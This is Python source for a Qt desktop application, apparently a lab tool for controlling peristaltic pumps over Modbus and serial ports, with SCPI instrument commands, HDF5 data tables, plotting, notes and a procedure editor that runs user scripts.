self.time_stamp = [0]
self.reading = [0]
self.graphWidget.setBackground("000")
pen = pg.mkPen(color=(255, 0, 0), width=3)
self.plot = self.graphWidget.plot(self.time_stamp, self.reading, pen=pen)
self.timer = QTimer()
self.timer.setInterval(10)
self.timer.timeout.connect(self.update_plot_data)
self.timer.start()
###################
self.data = test_generator()
self.data.__next__()
self.data.__next__()
self.data.__next__()
#############################
def update_plot_data(self):
self.time_stamp.append(self.time_stamp[-1] + 50)
self.reading.append(int(self.data.__next__()))
if len(self.time_stamp) > self.n:
self.time_stamp = self.time_stamp[1:]
self.reading = self.reading[1:]
self.plot.setData(self.time_stamp, self.reading)
class MonitorAction(QAction):
def __init__(self, parent):
super().__init__()
self.setParent(parent)
self.setText("Monitor")
self.setStatusTip("open monitor")
self.setIcon(icon("line-chart.png"))
self.triggered.connect(self.clicked)
def clicked(self):
self.parent().add_sub_win(MonitorWidget())
class GraphViewer(QMainWindow):
def __init__(self, path):
super().__init__()
self.image_QLabel = QLabel()
self.image_QLabel.setScaledContents(True)
self.image = QImage(path)
self.pixmap = QPixmap(self.image)
self.image_QLabel.setPixmap(self.pixmap.scaled(self.size(), Qt.IgnoreAspectRatio))
self.scrollArea = QScrollArea()
self.scrollArea.setWidget(self.image_QLabel)
zoom_in_QPushButton = QAction(icon('zoom_in.png'), "zoom in +", self)
zoom_in_QPushButton.triggered.connect(self.zoom_in)
zoom_out_QPushButton = QAction(icon('zoom_out.png'), "zoom out -", self)
zoom_out_QPushButton.triggered.connect(self.zoom_out)
toolbar = QToolBar()
toolbar.addAction(zoom_in_QPushButton)
toolbar.addAction(zoom_out_QPushButton)
toolbar.setMovable(False)
self.addToolBar(Qt.LeftToolBarArea, toolbar)
self.setCentralWidget(self.scrollArea)
self.scaleFactor = 1.0
self.zoom_out()
self.zoom_out()
def zoom_in(self):
self.scale_image(1.25)
def zoom_out(self):
self.scale_image(0.8)
def scale_image(self, factor):
self.scaleFactor *= factor
self.image_QLabel.resize(self.scaleFactor * self.image_QLabel.pixmap().size())
self.adjust_scrollBar(self.scrollArea.horizontalScrollBar(), factor)
self.adjust_scrollBar(self.scrollArea.verticalScrollBar(), factor)
@staticmethod
def adjust_scrollBar(scrollBar, factor):
scrollBar.setValue(int(factor * scrollBar.value() + ((factor - 1) * scrollBar.pageStep() / 2)))
class OpenGraphAction(QAction):
def __init__(self, parent):
super().__init__()
self.setParent(parent)
self.setText("Open Figure")
self.setStatusTip("Open Figure")
self.setIcon(icon("line-graph.png"))
self.triggered.connect(self.open_figure)
def open_figure(self):
path = os.path.join(os.getcwd(), MAIN_PROJECTS_SAVED_FILE, self.parent().project_name,
SUB_MAIN_PROJECTS_SAVED_FILE[1])
print(path)
path, _ = QFileDialog.getOpenFileName(None, "Open file", dir=path)
if path:
self.parent().add_sub_win(GraphViewer(path))
class StepFunction(StepIncreaseWindow):
def __init__(self):
super(StepFunction, self).__init__()
def start_it(self):
pass
class StepFunctionAction(QAction):
StepFunctionAddedSignal = Signal(str)
def __init__(self, parent):
super().__init__()
self.setText("step function")
self.setIcon(icon("stepincrease.png"))
self.setStatusTip("step function tool")
self.setParent(parent)
self.triggered.connect(self.clicked)
def clicked(self):
self.parent().add_sub_win(StepFunction())
class Capturing(list):
"stack over flow"
def __enter__(self):
self._stdout = sys.stdout
sys.stdout = self._stringio = StringIO()
return self
def __exit__(self, *args):
self.extend(self._stringio.getvalue().splitlines())
del self._stringio
sys.stdout = self._stdout
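# --- Illustrative sketch (not part of the original application) ---
# Capturing redirects sys.stdout into the list itself; this is how
# TextEditor.run() below collects the output of exec()'d procedures.
def _example_capturing():
    with Capturing() as output:
        print("hello")
        print("world")
    return output  # -> ['hello', 'world']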
class TextEditor(QMainWindow):
AddProcedureClickedSignal = Signal(str)
def __init__(self):
super().__init__()
t = """ModbusBuilder = ModbusBuilder()
start = ModbusBuilder.build_start()
stop = ModbusBuilder.build_stop()\n
p = PumpModbusCommandSender()\n
p.send_pump(data=stop, send_to='COM3')"""
self.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
layout = QGridLayout()
w = QWidget()
w.setLayout(layout)
self.setCentralWidget(w)
self.status = QStatusBar()
self.setStatusBar(self.status)
self.out_put_TextEdit = QTextEdit()
# self.out_put_TextEdit.setMaximumHeight(150)
self.out_put_TextEdit.setReadOnly(True)
self.out_put_TextEdit.setStyleSheet("color: blue;")
self.out_put_TextEdit_dock = CreateDockWindows(title="OutPut", parent=self,
widget=self.out_put_TextEdit,
area=Qt.BottomDockWidgetArea)
self.addDockWidget(Qt.BottomDockWidgetArea, self.out_put_TextEdit_dock)
self.toolbar = QToolBar("main toolbar")
self.toolbar.setIconSize(QSize(16, 16))
self.addToolBar(self.toolbar)
run_action = QAction(icon("play.png"), "Run", self)
run_action.setStatusTip("Run your procedure")
run_action.triggered.connect(self.run)
self.toolbar.addAction(run_action)
self.toolbar.addSeparator()
save_action = QAction(icon("save.png"), "Save", self)
save_action.setStatusTip("Save your procedure")
save_action.triggered.connect(self.procedure_save)
self.toolbar.addAction(save_action)
self.toolbar.addSeparator()
add_action = QAction(icon("add.png"), "Add Procedure", self)
add_action.setStatusTip("Add your procedure to the toolbar")
add_action.triggered.connect(self.add_procedure)
self.toolbar.addAction(add_action)
self.file_name_QLineEdit = QLineEdit()
self.file_name_QLineEdit.setText('procedure.py')
self.file_name_QLabel = QLabel("Procedure Name")
self.procedure_QTextEdit = QTextEdit()
self.procedure_QTextEdit.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
Highlighter(self.procedure_QTextEdit.document())
self.procedure_QTextEdit.append(t)
f = self.font()
f.setFamily('verdana')
f.setPointSize(11)
self.procedure_QTextEdit.setFont(f)
self.procedure_QTextEdit.setStyleSheet("color: black;")
layout.addWidget(self.file_name_QLabel, 0, 0, 1, 1)
layout.addWidget(self.file_name_QLineEdit, 0, 1, 1, 1)
layout.addWidget(self.procedure_QTextEdit, 1, 0, 3, 3)
def error_message(self, s):
dlg = QMessageBox(self)
dlg.setText(s)
dlg.setIcon(QMessageBox.Critical)
dlg.show()
def add_procedure(self):
self.AddProcedureClickedSignal.emit(self.file_name_QLineEdit.text())
def procedure_save(self):
project_name = window.project_name
file_name = self.file_name_QLineEdit.text()
if file_name == "":
file_name = "no_name.py"
elif ".py" not in file_name and len(file_name) > 1:
file_name += '.py'
path = os.path.join(os.getcwd(), MAIN_PROJECTS_SAVED_FILE, project_name,
SUB_MAIN_PROJECTS_SAVED_FILE[4], file_name)
text = self.procedure_QTextEdit.toPlainText()
try:
with open(path, 'w') as f:
f.write(text)
except Exception as e:
self.error_message(str(e))
# self.parent().hide()
def procedure_open(self, path, name):
try:
with open(path) as f:
text = f.read()
except Exception as e:
self.error_message(str(e))
else:
self.procedure_QTextEdit.setPlainText(text)
self.file_name_QLineEdit.setText(name)
def run(self):
def __exc():
try:
self.out_put_TextEdit.setStyleSheet("color: blue;")
with Capturing() as output:
exec(self.procedure_QTextEdit.toPlainText())
for _ in output:
self.out_put_TextEdit.append(str(_))
except Exception as e:
self.out_put_TextEdit.setStyleSheet("color: red;")
self.out_put_TextEdit.append(str(e))
t = threading.Thread(target=__exc)
t.start()
def sizeHint(self):
return QSize(900, 700)
class NewTextEditorAction(QAction):
NewTextEditorAddedSignal = Signal(str)
def __init__(self, parent):
super().__init__()
# self.thread_pool = QThreadPool()
self.setText("New Procedure")
self.setIcon(icon("procedure.png"))
self.setStatusTip("start a new procedure")
self.setParent(parent)
self.triggered.connect(self.clicked)
def clicked(self):
self.parent().add_sub_win(TextEditor())
class Highlighter(QSyntaxHighlighter):
def highlightBlock(self, text):
_format = QTextCharFormat()
# _format.setFontWeight(QFont.Bold)
key_list_1 = ["Return", 'type', 'Parameter', '__init__()', 'False', 'None', 'True', 'and', 'as', 'break',
'class',
'continue', 'float', 'def', 'elif', 'else', 'except', 'finally', 'for', 'from',
'if', 'import', 'in', 'is', 'lambda', 'not', 'or', 'pass', 'raise', 'return',
'try', 'while', 'with', 'not', 'yield', 'str', 'int', 'self', 'range', 'print', ]
key_list_2 = [':', '(', ')', '=', '>', '<', ',',
'!', '/', '"', "."]
key_list_3 = [str(i) for i in range(10)]
for expression in key_list_2 + key_list_1 + key_list_3:
try:
index = text.index(expression)
if expression in key_list_1:
_format.setForeground(Qt.darkMagenta)
elif expression in key_list_2:
_format.setForeground(Qt.red)
elif expression in key_list_3:
_format.setForeground(Qt.blue)
except Exception as e:
str(e)
index = -1
while index >= 0:
length = len(expression)
self.setFormat(index, length, _format)
try:
index = text.index(expression, index + length)
except:
index = -1
class NotePad(QWidget):
def __init__(self):
super().__init__()
layout = QGridLayout()
self.setLayout(layout)
self.note_QPlainTextEdit = QPlainTextEdit()
self.note_name_QLineEdit = QLineEdit()
self.note_name_QLabel = QLabel("Note Name")
layout.addWidget(self.note_name_QLabel, 0, 0, 1, 1)
layout.addWidget(self.note_name_QLineEdit, 0, 1, 1, 1)
layout.addWidget(self.note_QPlainTextEdit, 1, 0, 3, 3)
save_note = QPushButton(icon("save.png"), "Save", self)
save_note.clicked.connect(self.note_save)
cancel_note = QPushButton("Cancel", self)
cancel_note.clicked.connect(lambda: self.parent().close())
layout.addWidget(save_note, 4, 0, 1, 1)
layout.addWidget(cancel_note, 4, 1, 1, 1)
def error_message(self, s):
dlg = QMessageBox(self)
dlg.setText(s)
dlg.setIcon(QMessageBox.Critical)
dlg.show()
def note_save(self):
project_name = window.project_name
note_name = self.note_name_QLineEdit.text()
if note_name == "":
note_name = "no_name"
path = os.path.join(os.getcwd(), MAIN_PROJECTS_SAVED_FILE, project_name,
SUB_MAIN_PROJECTS_SAVED_FILE[3], f"{note_name}.txt")
text = self.note_QPlainTextEdit.toPlainText()
try:
with open(path, 'w') as f:
f.write(text)
except Exception as e:
self.error_message(str(e))
self.parent().hide()
def note_open(self, path, name):
try:
with open(path) as f:
text = f.read()
except Exception as e:
self.error_message(str(e))
else:
self.note_QPlainTextEdit.setPlainText(text)
self.note_name_QLineEdit.setText(name)
class CreateNotePadAction(QAction):
CreateNewNoteClicked = Signal(object)
def __init__(self, parent):
super().__init__()
self.setParent(parent)
self.setText("Create New Note")
self.setIcon(icon("note.png"))
self.setStatusTip("Create New Note")
self.triggered.connect(self.clicked)
def clicked(self):
self.CreateNewNoteClicked.emit(NotePad())
class TableModel(QAbstractTableModel):
def __init__(self, data):
super().__init__()
self._data = data
def data(self, index, role):
if role == Qt.DisplayRole:
# Note: the numpy axes are swapped here on purpose, to match
# rowCount()/columnCount() below (which report shape[1]/shape[0])
value = self._data[index.column(), index.row()]
return str(value)
def rowCount(self, index):
return self._data.shape[1]
def columnCount(self, index):
return self._data.shape[0]
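# --- Illustrative sketch (not part of the original application) ---
# TableModel expects the numpy array with shape (columns, rows) because of
# the swapped indexing above; TableViewer below wires such a model to a view.
def _example_table_model():
    data = np.array([[1, 2, 3], [4, 5, 6]])  # 2 columns x 3 rows under this convention
    return TableModel(data)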
class TableViewer(QMainWindow):
def __init__(self, data=np.array([])):
super().__init__()
self.table = QTableView()
self.model = TableModel(data)
self.table.setModel(self.model)
self.setCentralWidget(self.table)
class CreatNewTableAction(QAction):
NewTableCreatedSignal = Signal(dict)
def __init__(self, parent):
super().__init__()
self.setText("New Table")
self.setStatusTip("Creat a New Table")
self.setIcon(icon("new_table"))
self.NewTableDialog = None
self.triggered.connect(self.show_table_dialog)
self.setParent(parent)
self.database = None
self.data_list = []
def create_new_table(self):
table_name = self.NewTableDialog.table_name_QLineEdit.text()
for i in range(self.NewTableDialog.dataset_QListWidget.count()):
if self.NewTableDialog.dataset_QListWidget.item(i).checkState() == Qt.Checked:
data = self.database.get_one_data_set(self.NewTableDialog.dataset_QListWidget.item(i).text())
self.data_list.append(data)
self.data_list = np.array(self.data_list)
if special_characters_detector(table_name):
return
self.parent().add_sub_win(TableViewer(data=self.data_list))
# self.NewTableCreatedSignal.emit({"table_name": table_name})
self.NewTableDialog.hide()
def show_table_dialog(self):
self.data_list = []
self.NewTableDialog = NewTableDialog()
self.NewTableDialog.cancel_QPushButton.clicked.connect(self.NewTableDialog.close)
self.NewTableDialog.save_QPushButton.clicked.connect(self.create_new_table)
self.database = DataBase(self.parent().project_name)
self.NewTableDialog.add_list(self.database.get_list_data_set())
self.NewTableDialog.show()
class CreateNewProjectFileTree:
def __init__(self, project_name):
self.project_name = project_name
self.back_dir = os.getcwd()
if not os.path.exists(MAIN_PROJECTS_SAVED_FILE):
os.mkdir(MAIN_PROJECTS_SAVED_FILE)
os.chdir(MAIN_PROJECTS_SAVED_FILE)
def create_dir(self):
if os.path.exists(self.project_name):
ErrorMassage("Name already exist", "this name is already exist\nplease try different name")
os.chdir(self.back_dir)
return False
elif special_characters_detector(self.project_name):
os.chdir(self.back_dir)
return False
else:
for file in SUB_MAIN_PROJECTS_SAVED_FILE:
path = os.path.join(self.project_name, file)
os.makedirs(path)
os.chdir(self.back_dir)
return True
class SCPICommandLine(QWidget):
def __init__(self):
super().__init__()
self.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
layout = QGridLayout()
self.setLayout(layout)
self.rm = pyvisa.ResourceManager()
a = self.rm.list_resources()
self.pyvisaQLineEdit = QLineEdit()
self.historyQPlainTextEdit = QPlainTextEdit()
self.historyQPlainTextEdit.setReadOnly(True)
# self.historyQPlainTextEdit.setStyleSheet("color: blue;")
self.pyvisa_list_resources_QComboBox = QComboBox()
self.pyvisa_list_resources_QComboBox.addItems(a)
self.pyvisa_list_resources_QComboBox.setFixedSize(80, 20)
layout.addWidget(self.pyvisa_list_resources_QComboBox, 0, 0, 1, 1)
layout.addWidget(self.historyQPlainTextEdit, 1, 0, 2, 2)
layout.addWidget(self.pyvisaQLineEdit, 2, 0, 1, 2)
f = self.font()
f.setFamily('verdana')
f.setPointSize(14)
# f.setWeight(5)
self.pyvisaQLineEdit.setFont(f)
# self.pyvisaQLineEdit.setStyleSheet("color: red;")
self.pyvisaQLineEdit.clear()
# self.setEnabled(False)
self.pyvisaQLineEdit.returnPressed.connect(self.pressed)
def sizeHint(self):
return QSize(1080, 100)
def pressed(self):
# my_instrument = self.rm.open_resource(self.pyvisa_list_resources_QComboBox.currentText())
cmd = self.pyvisaQLineEdit.text()
self.historyQPlainTextEdit.appendPlainText(f'>> {cmd}')
# my_instrument.write(cmd)
self.pyvisaQLineEdit.clear()
class NewProjectAction(QAction):
NewProjectAddedSignal = Signal(str)
def __init__(self, parent):
super().__init__()
self.NewProjectSetNameDialog = NewProjectSetNameDialog()
self.triggered.connect(self.NewProjectSetNameDialog.show)
self.NewProjectSetNameDialog.save_QPushButton.clicked.connect(self.save_project_name_dialog)
self.NewProjectSetNameDialog.cancel_QPushButton.clicked.connect(self.NewProjectSetNameDialog.close)
self.setText("New Project")
self.setIcon(icon("new_project.png"))
self.setStatusTip("start a new project")
self.setParent(parent)
self.setShortcut(QKeySequence("Ctrl+n"))
def save_project_name_dialog(self):
project_name = self.NewProjectSetNameDialog.file_name_QLineEdit.text()
if CreateNewProjectFileTree(project_name).create_dir():
DataBase(project_name).create_new_hdf5_file()
self.NewProjectSetNameDialog.hide()
self.NewProjectAddedSignal.emit(project_name)
class OpenProjectAction(QAction):
OpenProjectActionClickedSignal = Signal(str)
def __init__(self, parent):
super().__init__()
self.setText("Open")
self.setParent(parent)
self.setShortcut(QKeySequence("Ctrl+o"))
self.setIcon(icon("open.png"))
self.setStatusTip("open old project")
self.OpenProjectDialog = OpenProjectDialog()
self.OpenProjectDialog.save_QPushButton.clicked.connect(self.clicked)
self.OpenProjectDialog.cancel_QPushButton.clicked.connect(self.OpenProjectDialog.close)
self.triggered.connect(self.triggered_open)
def triggered_open(self):
self.OpenProjectDialog.project_list_QComboBox.clear()
self.OpenProjectDialog.project_list_QComboBox.addItems(os.listdir(MAIN_PROJECTS_SAVED_FILE))
self.OpenProjectDialog.show()
def clicked(self):
# file, _ = QFileDialog.getOpenFileName(self.parent(), "Open Project", os.path.join(os.getcwd(),
# MAIN_PROJECTS_SAVED_FILE))
self.OpenProjectActionClickedSignal.emit(self.OpenProjectDialog.project_list_QComboBox.currentText())
self.OpenProjectDialog.hide()
class DataBase:
def __init__(self, project_name):
self.main_file = os.path.join(os.getcwd(), MAIN_PROJECTS_SAVED_FILE, project_name,
SUB_MAIN_PROJECTS_SAVED_FILE[0], f"{project_name}.h5")
def create_new_hdf5_file(self):
with h5py.File(self.main_file, "a") as t:
pass
self.create_new_data_set(name='time stamp', data=np.arange(0, 100))
self.create_new_data_set('voltage_data')
self.create_new_data_set('current_data')
self.create_new_data_set('x_data')
self.create_new_data_set('data2')
self.create_new_data_set('data3', data=np.arange(300, 400) / 100)
# def create_new_table(self, table_name):
#
# class Description(tb.IsDescription):
# time_stamp = tb.Int32Col()
# pump_1_speed = tb.Float64Col()
# pump_2_speed = tb.Float64Col()
# voltage = tb.Float64Col()
# note = tb.StringCol(itemsize=5)
#
# try:
# with tb.open_file(self.main_file, "a") as t:
# a = t.create_table(t.root, table_name, Description)
# # a.append(image)
#
# except tb.exceptions.NodeError:
# return ErrorMassage("Name already exist", "this name is already exist\nplease try different name")
#
def create_new_data_set(self, name, data=np.array(np.random.random(100))):
try:
with h5py.File(self.main_file, "a") as f:
f.create_dataset(name=name, data=data)
except Exception as e:
return ErrorMassage("Error", str(e))
def get_list_data_set(self):
with h5py.File(self.main_file, "a") as f:
return list(f.keys())
def get_one_data_set(self, name):
with h5py.File(self.main_file, "a") as f:
return f.get(name)[:]
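# --- Illustrative sketch (not part of the original application) ---
# Typical round trip through DataBase: create the backing HDF5 file with its
# default datasets, then list them and read one back as a numpy array. The
# project name is a placeholder and its directory tree must already exist
# (see CreateNewProjectFileTree).
def _example_database_roundtrip(project_name="demo_project"):
    db = DataBase(project_name)
    db.create_new_hdf5_file()             # also seeds 'time stamp', 'voltage_data', ...
    names = db.get_list_data_set()        # e.g. ['current_data', 'data2', ...]
    data = db.get_one_data_set(names[0])  # numpy array copy of that dataset
    return names, data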
class DarkModeAction(QAction):
def __init__(self):
super().__init__()
self.setText("DarkMode")
self.setIcon(icon("dark_mode.png"))
self.triggered.connect(self.clicked)
self.setCheckable(True)
@staticmethod
def clicked(s):
if s:
dark(app)
else:
light(app)
class CreateDockWindows(QDockWidget):
def __init__(self, title="No title", parent=None, widget=None, area=None):
super().__init__()
self.setWindowTitle(title)
self.setParent(parent)
self.setAllowedAreas(area)
self.setWidget(widget)
class RemoteAction(QAction):
def __init__(self, parent):
super().__init__()
self.setText("Remote")
self.setStatusTip("start remote connection")
self.setParent(parent)
class RemoteControlPanel(QMainWindow):
def __init__(self, parent):
super().__init__()
self.setParent(parent)
self.RemoteManger = self.parent().RemoteManger
self.ip_QLabel = QLabel("Host IP Address")
self.RemoteManger_ip_addr_QLineEdit = QLineEdit(self.RemoteManger.ip_addr)
self.RemoteManger_ip_addr_QLineEdit.setReadOnly(True)
self.port_QLabel = QLabel("Port")
self.RemoteManger_port_QLineEdit = QLineEdit(str(self.RemoteManger.port))
self.RemoteManger_port_QLineEdit.setReadOnly(True)
self.state_QLabel = QLabel("State")
self.RemoteManger_state_QLineEdit = QLabel(self.RemoteManger.current_state)
# self.RemoteManger_state_QLineEdit.setReadOnly(True)
self.server_listen_QPushButton = QPushButton('listing')
self.server_listen_QPushButton.clicked.connect(self.listing)
self.server_close_QPushButton = QPushButton('close')
self.server_close_QPushButton.clicked.connect(self.close_connection)
layout = QGridLayout()
layout.addWidget(self.ip_QLabel, 0, 0)
layout.addWidget(self.RemoteManger_ip_addr_QLineEdit, 0, 1)
layout.addWidget(self.port_QLabel, 1, 0)
layout.addWidget(self.RemoteManger_port_QLineEdit, 1, 1)
layout.addWidget(self.RemoteManger_state_QLineEdit, 2, 1)
layout.addWidget(self.state_QLabel, 2, 0)
layout.addWidget(self.server_listen_QPushButton, 3, 0)
layout.addWidget(self.server_close_QPushButton, 4, 0)
w = QWidget()
w.setLayout(layout)
self.setCentralWidget(w)
def listing(self):
self.RemoteManger.server_listen()
self.RemoteManger_state_QLineEdit.setText(self.RemoteManger.current_state)
def close_connection(self):
self.RemoteManger.close_connection()
self.RemoteManger_state_QLineEdit.setText(self.RemoteManger.current_state)
class PumpQWidget(QWidget):
PumpSignalSend = Signal(dict)
def __init__(self):
super().__init__()
self.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.remote_conn = False
self.connection_mode_QLabel = QLabel("Pump Connection Mode")
self.connection_mode_QComboBox = QComboBox()
self.connection_mode_QComboBox.addItems(["USB-direct", "Remote"])
self.connection_mode_QComboBox.setDisabled(True)
self.connection_mode_QComboBox.currentTextChanged.connect(self.remote_conn_changed)
# self.PumpModbusCommandSender = PumpModbusCommandSender()
self.pump_mode_state = PumpMode.COUPLED
group_box_pump_mode = QGroupBox("Mode")
self.mode_QLabel = QLabel("Pump Mode")
self.mode_QComboBox = QComboBox()
self.mode_QComboBox.addItems(["coupled", "decoupled"])
self.mode_QComboBox.currentTextChanged.connect(self.pump_mode_changed)
layout_pump_mode = QGridLayout()
layout_pump_mode.addWidget(self.connection_mode_QLabel, 0, 0)
layout_pump_mode.addWidget(self.connection_mode_QComboBox, 0, 1)
layout_pump_mode.addWidget(self.mode_QLabel, 1, 0)
layout_pump_mode.addWidget(self.mode_QComboBox, 1, 1)
group_box_pump_mode.setLayout(layout_pump_mode)
self.pump1 = PumpAbstract("Pump 1")
self.pump1.pump_speed_QDoubleSpinBox.valueChanged.connect(lambda: self.send_to_pump(self.pump1, 'speed'))
self.pump1.pump_direction_QComboBox.currentTextChanged.connect(
lambda: self.send_to_pump(self.pump1, 'direction'))
self.pump1.pump_send_state_QPushButton.clicked.connect(lambda: self.send_to_pump(self.pump1, 'button'))
self.pump2 = PumpAbstract("Pump 2")
self.pump2.pump_speed_QDoubleSpinBox.valueChanged.connect(lambda: self.send_to_pump(self.pump2, 'speed'))
self.pump2.pump_direction_QComboBox.currentTextChanged.connect(
lambda: self.send_to_pump(self.pump2, 'direction'))
self.pump2.pump_send_state_QPushButton.clicked.connect(lambda: self.send_to_pump(self.pump2, 'button'))
self.pump2.setDisabled(True)
g_layout = QGridLayout()
g_layout.addWidget(group_box_pump_mode, 0, 0, 1, 1)
g_layout.addWidget(self.pump1, 1, 0, 2, 1)
g_layout.addWidget(self.pump2, 3, 0, 2, 1)
g_layout.setSpacing(0)
self.setLayout(g_layout)
def sizeHint(self):
return QSize(100, 50)
def pump_mode_changed(self):
if self.mode_QComboBox.currentText() == "coupled":
self.pump2.setDisabled(True)
self.pump_mode_state = PumpMode.COUPLED
else:
self.pump2.setDisabled(False)
self.pump_mode_state = PumpMode.DECOUPLED
def send_to_pump(self, pump, cmd):
parameters = {
'cmd': cmd,
'pump_mode': self.pump_mode_state,
'port': pump.pump_port_selection_QComboBox.currentText(),
'speed': pump.pump_speed_QDoubleSpinBox.value(),
'direction': pump.pump_direction_QComboBox.currentText(),
'button': pump.pump_send_state_QPushButton.isChecked()
}
self.PumpSignalSend.emit(parameters)
def remote_conn_changed(self):
usb_ports = PortManger().get_ports_list
self.pump1.pump_port_selection_QComboBox.clear()
self.pump2.pump_port_selection_QComboBox.clear()
if self.connection_mode_QComboBox.currentText() == "Remote":
s = self.parent().parent().RemoteManger
if s is not None:
try:
self.pump1.pump_port_selection_QComboBox.addItems(s.get_ports_list())
self.pump2.pump_port_selection_QComboBox.addItems(s.get_ports_list())
except Exception as e:
ErrorMassage("Error", e)
elif self.connection_mode_QComboBox.currentText() == "USB-direct":
self.pump1.pump_port_selection_QComboBox.addItems(usb_ports)
self.pump2.pump_port_selection_QComboBox.addItems(usb_ports)
class HelpAction(QAction):
def __init__(self, parent):
super().__init__()
self.setText("Help")
self.setParent(parent)
self.setStatusTip("Need Help")
self.triggered.connect(self.clicked)
self.setShortcut(QKeySequence("Ctrl+h"))
def clicked(self):
self.parent().add_sub_win(HelpDialog())
class HelpDialog(QMainWindow):
def __init__(self):
super().__init__()
self.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.setWindowTitle("Help")
self.setWindowIcon(icon("help.png"))
self.layout = QGridLayout()
self.help_QTextEdit = QTextEdit('Select Topic')
f = self.font()
f.setFamily('courier new')
f.setPointSize(12)
self.help_QTextEdit.setFont(f)
self.help_QTextEdit.setReadOnly(True)
Highlighter(self.help_QTextEdit.document())
self.help_QListWidget = QListWidget()
self.help_QListWidget.setMaximumWidth(200)
self.help_QListWidget.setAcceptDrops(False)
self.help_QListWidget.doubleClicked.connect(self.topic)
self.help_QListWidget.setSelectionMode(QAbstractItemView.SelectionMode.ContiguousSelection)
self.ok_QPushButton = QPushButton("Ok")
self.ok_QPushButton.clicked.connect(self.hide)
self.layout.addWidget(self.help_QTextEdit, 1, 1)
self.layout.addWidget(self.help_QListWidget, 1, 0)
self.layout.addWidget(self.ok_QPushButton, 3, 0)
w = QWidget()
w.setLayout(self.layout)
self.setCentralWidget(w)
self.add_list()
def add_list(self, items=None):
if items is None:
items = ['ModbusBuilder', 'PumpModbusCommandSender', 'PortManger']
for i, j in enumerate(items):
l = QListWidgetItem(j)
self.help_QListWidget.insertItem(i + 1, l)
def topic(self, s):
text_0 = """
This class is used as ModBus Message builder
class modbus. ModbusBuilder
__init__()
build_start ()
build start ModBus message
build_stop ()
build stop ModBus message
build_flow_direction (direction="cw")
build flow direction ModBus message
Parameter: direction(str) : flow direction, “cw”, “ccw”
build_change_speed (new_speed=0)
Parameter: new_speed(float) : pump speed in rpm
build speed ModBus message
get_modbus
Getter (property): Get the modbus last built.
Return type: str"""
text_1 = """This class is used as to send ModBus message though usb port
class control_api. PumpModbusCommandSender
__init__()
send_pump (data, send_to)
send a specific message to a specified port
Parameter: data(bytearray) : contains the message
send_to(str) : port, e.g. 'COM1', 'COM4'
Return type: None"""
text_2 = """This class is used to mange ports
class control_api. PortManger
__init__(remote=False, s="USB-SERIAL CH340")
get_ports_list
Getter (property): Get all Port list.
Return type: list
get_all_pump_ports_list
Getter (property): Get only pumps Port list.
Return type: list
get_number_of_pump_connected
Getter (property): Get number of pumps connected.
Return type: int"""
if s.row() == 0:
self.help_QTextEdit.setText(text_0)
elif s.row() == 1:
self.help_QTextEdit.setText(text_1)
elif s.row() == 2:
self.help_QTextEdit.setText(text_2)
def sizeHint(self):
return QSize(400, 500)
class AboutAction(QAction):
def __init__(self, parent):
super().__init__()
self.setParent(parent)
self.setText("About")
self.triggered.connect(self.clicked)
def clicked(self):
browser = QWebEngineView()
browser.setUrl('https://github.com/Mohamed-Nser-Said/RDF_project')
self.parent().add_sub_win(browser)
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.remote = False
self.project_name = None
self.RemoteManger = None
self.setDocumentMode(True)
self.setWindowTitle("RedoX App 2.1")
self.setWindowIcon(icon("app.png"))
self.label = Label(text="Create New Project Ctrl+N")
self.setCentralWidget(self.label)
self.mdi = QMdiArea()
# QDocks
self.PumpQWidget = PumpQWidget()
self.PumpQWidget_dock = CreateDockWindows(title="Pump control", parent=self, widget=self.PumpQWidget,
area=Qt.RightDockWidgetArea | Qt.BottomDockWidgetArea)
self.FileTreeViewer = FileTreeViewer(self)
self.FileTreeViewer_dock = CreateDockWindows(title="File Tree", parent=self, widget=self.FileTreeViewer,
area=Qt.LeftDockWidgetArea)
self.SCPICommandLine = SCPICommandLine()
self.SCPICommandLine_dock = CreateDockWindows(title="SCPI Command Line", parent=self,
widget=self.SCPICommandLine,
area=Qt.BottomDockWidgetArea | Qt.TopDockWidgetArea)
self.addDockWidget(Qt.RightDockWidgetArea, self.PumpQWidget_dock)
self.addDockWidget(Qt.LeftDockWidgetArea, self.FileTreeViewer_dock)
self.addDockWidget(Qt.BottomDockWidgetArea, self.SCPICommandLine_dock)
# all actions
self.help_action = HelpAction(self)
self.about_action = AboutAction(self)
self.monitor = MonitorAction(self)
self.dark_mode_action = DarkModeAction()
self.NewProjectAction = NewProjectAction(self)
self.OpenProjectAction = OpenProjectAction(self)
self.CreatNewTableAction = CreatNewTableAction(self)
self.CreateNotePadAction = CreateNotePadAction(self)
self.NewTextEditorAction = NewTextEditorAction(self)
self.StepFunctionAction = StepFunctionAction(self)
self.OpenGraphAction = OpenGraphAction(self)
self.RemoteAction = RemoteAction(self)
self.NewGraphAction = NewGraphAction(self)
# signals and slots
self.CreateNotePadAction.CreateNewNoteClicked.connect(self.add_sub_win)
self.FileTreeViewer.FileOpenedSignal.connect(self.file_opened)
self.NewProjectAction.NewProjectAddedSignal.connect(self.project_manger)
self.OpenProjectAction.OpenProjectActionClickedSignal.connect(self.project_manger)
self.pump_single_receiver = PumpSingleReceiver()
self.PumpQWidget.PumpSignalSend.connect(self.pump_single_receiver.data_manger)
self.RemoteAction.triggered.connect(self.remote_activated)
# self.RemoteAction.triggered.connect(self.remote_trigger)
# self.CreatNewTableAction.NewTableCreatedSignal.connect(self.NewProjectTab.append_new_tabel)
# Toolbar and menu bar
self.menu = self.menuBar()
self.file = self.menu.addMenu("File")
self.file.addAction(self.NewProjectAction)
self.file.addAction(self.OpenProjectAction)
self.tools = self.menu.addMenu("Tools")
self.tools.addAction(self.CreateNotePadAction)
self.tools.addAction(self.StepFunctionAction)
self.tools.addAction(self.NewTextEditorAction)
self.tools.addAction(self.monitor)
self.view = self.menu.addMenu("View")
self.appearance = self.view.addMenu("Appearance")
self.appearance.addAction(self.dark_mode_action)
self.table = self.menu.addMenu("Tables")
self.table.addAction(self.CreatNewTableAction)
self.graph = self.menu.addMenu("Graph")
self.graph.addAction(self.NewGraphAction)
self.graph.addAction(self.OpenGraphAction)
self.remote_menu = self.menu.addMenu("Remote")
